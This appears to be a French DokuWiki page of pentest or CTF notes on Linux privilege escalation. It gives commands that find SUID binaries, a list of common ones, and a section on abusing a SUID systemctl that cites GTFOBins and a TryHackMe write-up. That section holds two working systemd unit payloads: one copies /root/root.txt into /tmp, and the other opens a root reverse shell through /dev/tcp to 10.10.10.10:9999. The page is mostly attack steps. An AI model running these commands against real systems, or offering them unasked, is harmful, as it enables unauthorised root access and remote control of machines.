====== Privesc GNU/Linux ======
===== SUID =====
''%%find / -user root -perm -4000 -print 2>/dev/null%%''\\
ou\\
''%%find / -perm -u=s -type f 2>/dev/null%%''
===== Liste des SUID courants =====
/bin/fusermount
/bin/mount
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/sbin/mount.cifs
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/squid/pinger
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
===== SUID systemctl =====
[[https://gtfobins.github.io/gtfobins/systemctl/]]\\
[[https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49]]\\
[[https://www.jil-wright.com/blog/tryhackmevulnversity]]
cd /bin
sh
sh -p
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output.txt"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF
cat /tmp/output.txt
[Unit]
Description=roooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'
[Install]
WantedBy=multi.user.target